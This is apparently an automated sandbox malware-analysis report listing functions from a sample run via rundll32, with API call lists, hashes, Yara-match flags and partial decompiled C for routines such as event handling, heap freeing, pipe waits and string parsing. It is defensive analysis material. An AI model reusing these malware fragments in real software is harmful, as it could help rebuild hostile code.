                                          • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,00B6FA24,?,?,00001000,?,?,00001000), ref: 00B6FE38
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,00B6FA24,?,?,00001000,?,?,00001000), ref: 00B6FE5A
                                          • GetLastError.KERNEL32(?,00B6FA24,?,?,00001000,?,?,00001000), ref: 00B6FE6E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                                          • String ID:
                                          • API String ID: 3370347312-0
                                          • Opcode ID: 4eff1cc7f6791cd9f3570ad8a3dc2168b11b4e8c397a40ea7eaa90621439facb
                                          • Instruction ID: 2a8ea760ec550ed8c67056e92be83be7a4dd8b8a57f478e4b4b972d7aabbc7dc
                                          • Opcode Fuzzy Hash: 4eff1cc7f6791cd9f3570ad8a3dc2168b11b4e8c397a40ea7eaa90621439facb
                                          • Instruction Fuzzy Hash: C4F0A431244205BBDB211F60AC09F6A3E65EF15751F204464FB05A61F1DB7655A0DB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048924BC Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E048924BC(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                          0x048924c6
                                          0x048924ca
                                          0x048924df
                                          0x048924e1
                                          0x048924e6
                                          0x048924ec
                                          0x048924ee
                                          0x048924f3
                                          0x048924fe
                                          0x048924f5
                                          0x048924f5
                                          0x048924f5
                                          0x048924f3
                                          0x0489250c

                                          APIs
                                          • memset.NTDLL ref: 048924CA
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,76DC81D0), ref: 048924DF
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 048924EC
                                          • CloseHandle.KERNEL32(?), ref: 048924FE
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: a06104c60c2602c154a4d4154f3655dd34dee976762a91b422abe1948e2831d5
                                          • Instruction ID: e23740e45779d21ca22851078a2ac2701aa96154c87a54f48ed1b356e1cf1121
                                          • Opcode Fuzzy Hash: a06104c60c2602c154a4d4154f3655dd34dee976762a91b422abe1948e2831d5
                                          • Instruction Fuzzy Hash: F0F054F1104B0CBFD7106F25DCC4C27BBDCEB451ACB154E6DF146C1501D675AC094A60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B66471 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.NTDLL ref: 00B6647F
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00B6A696,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 00B66494
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00B5D3E9,?,?), ref: 00B664A1
                                          • CloseHandle.KERNEL32(?,?,?,?,00B5D3E9,?,?), ref: 00B664B3
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: 066f4ac674c1c36fa8ec5602d6a5fb72fe1cd851dd788081dd8dc008c4827717
                                          • Instruction ID: 22375bf0322d0ae764eda307e4485dc1e0766cd9922094317d4e881bc7a6e856
                                          • Opcode Fuzzy Hash: 066f4ac674c1c36fa8ec5602d6a5fb72fe1cd851dd788081dd8dc008c4827717
                                          • Instruction Fuzzy Hash: D6F0F4B510470C7FD3106F65DCC4C27BBDCEB56299711896EF24682611DA7AA8154EA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B55EAE Relevance: 6.0, APIs: 4, Instructions: 40memorythreadtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B55EDF
                                          • RtlExitUserThread.NTDLL(00000000), ref: 00B55EF2
                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B55F03
                                          • _aulldiv.NTDLL(?,?,00002710,00000000), ref: 00B55F16
                                            • Part of subcall function 00B6A952: lstrlen.KERNEL32(00B5B047,00000000,00000000,00000000,?,00B7090A,?,00B5B047,00000000), ref: 00B6A968
                                            • Part of subcall function 00B6A952: lstrlen.KERNEL32(?,?,00B7090A,?,00B5B047,00000000), ref: 00B6A96F
                                            • Part of subcall function 00B6A952: RtlAllocateHeap.NTDLL(00000000,00000029), ref: 00B6A97D
                                            • Part of subcall function 00B6A952: wsprintfA.USER32 ref: 00B6A99F
                                            • Part of subcall function 00B6A952: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 00B6A9D0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$FreeTimelstrlen$AllocateExitFileSystemThreadUser_aulldivwsprintf
                                          • String ID:
                                          • API String ID: 157450322-0
                                          • Opcode ID: 1fa9c0d68bf6cf10db6cbdbcad0253563fd44319847a45141af11293d83fa258
                                          • Instruction ID: d457aebfa6152de37cd02838b1385718ede559c1c14553fa52ec4811ed04a589
                                          • Opcode Fuzzy Hash: 1fa9c0d68bf6cf10db6cbdbcad0253563fd44319847a45141af11293d83fa258
                                          • Instruction Fuzzy Hash: 9BF06972500204BFDB115BA9DC0EF8B7BACEB46722F1104A9F21DA31A0DB70AD95CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5709B Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,00B69299,000000FF,0614B7F0,?,?,00B6BB0E,0000003A,0614B7F0), ref: 00B570B7
                                          • GetLastError.KERNEL32(?,?,00B6BB0E,0000003A,0614B7F0,?,?,?,00B56B9D,00000001,00000000,?), ref: 00B570C2
                                          • WaitNamedPipeA.KERNEL32(00002710), ref: 00B570E4
                                          • WaitForSingleObject.KERNEL32(00000000,?,?,00B6BB0E,0000003A,0614B7F0,?,?,?,00B56B9D,00000001,00000000,?), ref: 00B570F2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                                          • String ID:
                                          • API String ID: 4211439915-0
                                          • Opcode ID: 605948ce782d4e866f14a742d761900f56a42c33fe546d46f124b8f1ef653054
                                          • Instruction ID: c73010aa2b7efb54800dbd5cb8844c3bce1b4a3001152d76281f716b42840e63
                                          • Opcode Fuzzy Hash: 605948ce782d4e866f14a742d761900f56a42c33fe546d46f124b8f1ef653054
                                          • Instruction Fuzzy Hash: 4FF06232645121ABD2211765AC8DB967F95EB11373F1245A1FE1EF75E0DB210CD4C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B57C54 Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?,?,00000000,00B5FABE), ref: 00B57C59
                                          • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 00B57C6E
                                          • wsprintfA.USER32 ref: 00B57C8A
                                            • Part of subcall function 00B5B968: memset.NTDLL ref: 00B5B97D
                                            • Part of subcall function 00B5B968: lstrlenW.KERNEL32(00000000,00000000,00000000,77D5DBB0,00000020,00000000), ref: 00B5B9B6
                                            • Part of subcall function 00B5B968: wcstombs.NTDLL ref: 00B5B9C0
                                            • Part of subcall function 00B5B968: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77D5DBB0,00000020,00000000), ref: 00B5B9F1
                                            • Part of subcall function 00B5B968: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B5B8C3), ref: 00B5BA1D
                                            • Part of subcall function 00B5B968: TerminateProcess.KERNEL32(?,000003E5), ref: 00B5BA33
                                            • Part of subcall function 00B5B968: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B5B8C3), ref: 00B5BA47
                                            • Part of subcall function 00B5B968: CloseHandle.KERNEL32(?), ref: 00B5BA7A
                                            • Part of subcall function 00B5B968: CloseHandle.KERNEL32(?), ref: 00B5BA7F
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 00B57CA6
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                                          • String ID:
                                          • API String ID: 1624158581-0
                                          • Opcode ID: e843027e84e5b2f7ede309ff82bc46b70c8fd36432081cb735b91d37ae9737b1
                                          • Instruction ID: 376e81ec7815d652f512921c5f28498d123db93f2c1061d9cfeaf47e4fc23153
                                          • Opcode Fuzzy Hash: e843027e84e5b2f7ede309ff82bc46b70c8fd36432081cb735b91d37ae9737b1
                                          • Instruction Fuzzy Hash: ECF054326441117BD6211729BC4DF6B7AADDBC2722F1501A5FE09D72A0DF2088858660
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5CDBF Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B5CDC8
                                          • Sleep.KERNEL32(0000000A), ref: 00B5CDD2
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5CDFA
                                          • RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B5CE18
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 6336b3a1cac30e3630599433d7e8d7052c83cd7f6f2c9d0e513f300f8d581b42
                                          • Instruction ID: f05559f853602cdcb04315d706a3298a6d719d52465392deffe724b3cf5c2509
                                          • Opcode Fuzzy Hash: 6336b3a1cac30e3630599433d7e8d7052c83cd7f6f2c9d0e513f300f8d581b42
                                          • Instruction Fuzzy Hash: 1DF05E716447419FEB219BA8DC49F063BE5EB11302F0588A0FA1ED72E1CB30E898CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04895976 Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04895976() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x489a30c; // 0x2cc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x489a35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x489a30c; // 0x2cc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x489a2d8; // 0x4e50000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                          0x04895976
                                          0x0489597d
                                          0x048959c7
                                          0x048959c9
                                          0x048959c9
                                          0x04895981
                                          0x04895987
                                          0x0489598c
                                          0x04895990
                                          0x04895996
                                          0x0489599d
                                          0x00000000
                                          0x00000000
                                          0x0489599f
                                          0x048959a4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x048959a4
                                          0x048959a6
                                          0x048959ae
                                          0x048959b1
                                          0x048959b1
                                          0x048959b7
                                          0x048959be
                                          0x048959c1
                                          0x048959c1
                                          0x00000000

                                          APIs
                                          • SetEvent.KERNEL32(000002CC,00000001,04893DC4), ref: 04895981
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04895990
                                          • CloseHandle.KERNEL32(000002CC), ref: 048959B1
                                          • HeapDestroy.KERNEL32(04E50000), ref: 048959C1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          • Opcode ID: 64257f97028512496d237d838bbf09b3b9553c1c887af2749164701c3faca7a2
                                          • Instruction ID: cfdda2020a725e5c267420f832cf672492f09f71498d5d873ab205ea26400d8d
                                          • Opcode Fuzzy Hash: 64257f97028512496d237d838bbf09b3b9553c1c887af2749164701c3faca7a2
                                          • Instruction Fuzzy Hash: 0BF01CB2B01B11BBFF266B79E848B5637D8EB04771B0C0E18BC15D7280DF28EC409960
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04893F7E Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E04893F7E() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x489a3cc; // 0x52495b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x489a3cc; // 0x52495b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x489a3cc; // 0x52495b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x489b81a) {
					HeapFree( *0x489a2d8, 0, _t10);
					_t7 =  *0x489a3cc; // 0x52495b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                          0x04893f7e
                                          0x04893f87
                                          0x04893f97
                                          0x04893f97
                                          0x04893f9c
                                          0x04893fa1
                                          0x00000000
                                          0x00000000
                                          0x04893f91
                                          0x04893f91
                                          0x04893fa3
                                          0x04893fa8
                                          0x04893fac
                                          0x04893fbf
                                          0x04893fc5
                                          0x04893fc5
                                          0x04893fce
                                          0x04893fd0
                                          0x04893fd4
                                          0x04893fda

                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(05249570), ref: 04893F87
                                          • Sleep.KERNEL32(0000000A), ref: 04893F91
                                          • HeapFree.KERNEL32(00000000), ref: 04893FBF
                                          • RtlLeaveCriticalSection.NTDLL(05249570), ref: 04893FD4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 3403d337f77ca11e6063df5b9c5420242519a12f9fae1cd455f9e67142f19115
                                          • Instruction ID: 9d3630292a1e6ebd7720adbf4ea2d04b6ce3f3266e0bb7d7d3e6d190e20bea41
                                          • Opcode Fuzzy Hash: 3403d337f77ca11e6063df5b9c5420242519a12f9fae1cd455f9e67142f19115
                                          • Instruction Fuzzy Hash: 26F0D4B4300A42AFEB18AF69EC49E2637F4EB48301B0D4908ED12D7390CA38BC00EA11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B62993 Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B6299C
                                          • Sleep.KERNEL32(0000000A), ref: 00B629A6
                                          • HeapFree.KERNEL32(00000000), ref: 00B629D4
                                          • RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B629E9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 65c5a1dd6926ec0babec3c68de17d997cb77d1f8f9d0d6ab95c9dcd3d7bb1d1f
                                          • Instruction ID: 768dd38d696bd9f237c2c95c901b31eca53845b02c1c99375548af5604f926d2
                                          • Opcode Fuzzy Hash: 65c5a1dd6926ec0babec3c68de17d997cb77d1f8f9d0d6ab95c9dcd3d7bb1d1f
                                          • Instruction Fuzzy Hash: E1F0DA75200A419FFB089B54EC89F1577A4EB85301B059865E90EC72E0CF34ACD0DA19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B70232 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.NTDLL ref: 00B7028E
                                          • CloseHandle.KERNEL32(?,?,00000100,?,00000000,?,00B5B047,00000000), ref: 00B702DC
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,00B71C4A,00000000,00B5B047,00B66749,00000000,00B5B047,00B630E3,00000000,00B5B047,00B6105E,00000000), ref: 00B705E7
                                          • GetLastError.KERNEL32(?,00000000,?), ref: 00B708E9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseErrorFreeHandleHeapLastmemset
                                          • String ID:
                                          • API String ID: 2333114656-0
                                          • Opcode ID: 78f769c2e71ce3e195c75a0bda80dbadfe79029adda3bc3ea28946a30596b0ba
                                          • Instruction ID: 47f8f46f0c1b68779ffa7508a2db7f066b9135c039bc9629217e59ee0bb3a666
                                          • Opcode Fuzzy Hash: 78f769c2e71ce3e195c75a0bda80dbadfe79029adda3bc3ea28946a30596b0ba
                                          • Instruction Fuzzy Hash: 4951C531254209FEDF11BF64DC85FAE36E8EB45700F2480E3F92DA6091DAB4CD55A6A3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B51000 Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B66378: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,00B51036,?,?,?,?), ref: 00B6639C
                                            • Part of subcall function 00B66378: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B663AE
                                            • Part of subcall function 00B66378: wcstombs.NTDLL ref: 00B663BC
                                            • Part of subcall function 00B66378: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,00B51036,?,?,?), ref: 00B663E0
                                            • Part of subcall function 00B66378: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00B663F5
                                            • Part of subcall function 00B66378: mbstowcs.NTDLL ref: 00B66402
                                            • Part of subcall function 00B66378: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,00B51036,?,?,?,?,?), ref: 00B66414
                                            • Part of subcall function 00B66378: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,00B51036,?,?,?,?,?), ref: 00B6642E
                                          • GetLastError.KERNEL32 ref: 00B5109F
                                            • Part of subcall function 00B5582E: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B558DC
                                            • Part of subcall function 00B5582E: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B55900
                                            • Part of subcall function 00B5582E: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,00B51087,?,?,?,?,?,?,?), ref: 00B5590E
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B510BB
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B510CC
                                          • SetLastError.KERNEL32(00000000), ref: 00B510CF
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                                          • String ID:
                                          • API String ID: 3867366388-0
                                          • Opcode ID: 7b854f5706f4fa887a991e8778bd5481f6b667c8daa00ea65b1881e21f0b98a4
                                          • Instruction ID: 0a1747539c6bf1e9cd3875229f3cbf9fadd51829a80e02f014b9720e0210ab7f
                                          • Opcode Fuzzy Hash: 7b854f5706f4fa887a991e8778bd5481f6b667c8daa00ea65b1881e21f0b98a4
                                          • Instruction Fuzzy Hash: FE313836900148FFCF129FA9DC44ADEBFB5EF49321B1445A6F929A2160C7318AA5DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6DA6D Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B6B4CF: lstrlen.KERNEL32(00000000,?,?,00000000,77D34620,?,00000001,00000001,?,00B663D9,?,?,?,?,?,00000000), ref: 00B6B529
                                            • Part of subcall function 00B6B4CF: lstrlen.KERNEL32(?,?,?,00000000,77D34620,?,00000001,00000001,?,00B663D9,?,?,?,?,?,00000000), ref: 00B6B547
                                            • Part of subcall function 00B6B4CF: RtlAllocateHeap.NTDLL(00000000,76D86985,?), ref: 00B6B573
                                            • Part of subcall function 00B6B4CF: memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,00B663D9,?,?,?,?,?,00000000), ref: 00B6B58A
                                            • Part of subcall function 00B6B4CF: HeapFree.KERNEL32(00000000,00000000), ref: 00B6B59D
                                            • Part of subcall function 00B6B4CF: memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,00B663D9,?,?,?,?,?,00000000), ref: 00B6B5AC
                                          • GetLastError.KERNEL32 ref: 00B6DB0C
                                            • Part of subcall function 00B5582E: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B558DC
                                            • Part of subcall function 00B5582E: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B55900
                                            • Part of subcall function 00B5582E: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,00B51087,?,?,?,?,?,?,?), ref: 00B5590E
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6DB28
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6DB39
                                          • SetLastError.KERNEL32(00000000), ref: 00B6DB3C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                                          • String ID:
                                          • API String ID: 2451549186-0
                                          • Opcode ID: 0b7e1e9ebc23d6af9735064748bc2054be41b75c343234e568dedfe3ae5241e5
                                          • Instruction ID: c1e6581ddb4881cc459fd7f2abebec870389d9d489369b03eb82d78db7dde2d4
                                          • Opcode Fuzzy Hash: 0b7e1e9ebc23d6af9735064748bc2054be41b75c343234e568dedfe3ae5241e5
                                          • Instruction Fuzzy Hash: 48312932904108FFCF129F99DC448DEBFB5FF48321B154596FA29A2120D7758AA1DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B594E8 Relevance: 5.1, APIs: 4, Instructions: 76COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          • Opcode ID: 6c294741354ccab5dd149cd86a505f7637abd2f0555b35d242ae62e90405fc7a
                                          • Instruction ID: dfa7d2b58d4af5d31103d65ef0601ca0fe254611b4cdaf47c03fa690466b4686
                                          • Opcode Fuzzy Hash: 6c294741354ccab5dd149cd86a505f7637abd2f0555b35d242ae62e90405fc7a
                                          • Instruction Fuzzy Hash: CB218E72500A09FBCB269F60EC80A667BB9FF183027040599FD4586911E732E8BADBD5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04895296 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04895296(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04894DF6(_t2);
				if(_t34 != 0) {
					_t30 = E04894DF6(_t28);
					if(_t30 == 0) {
						E04894C73(_t34);
					} else {
						_t39 = _a4;
						_t22 = E048979D7(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E048979D7(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
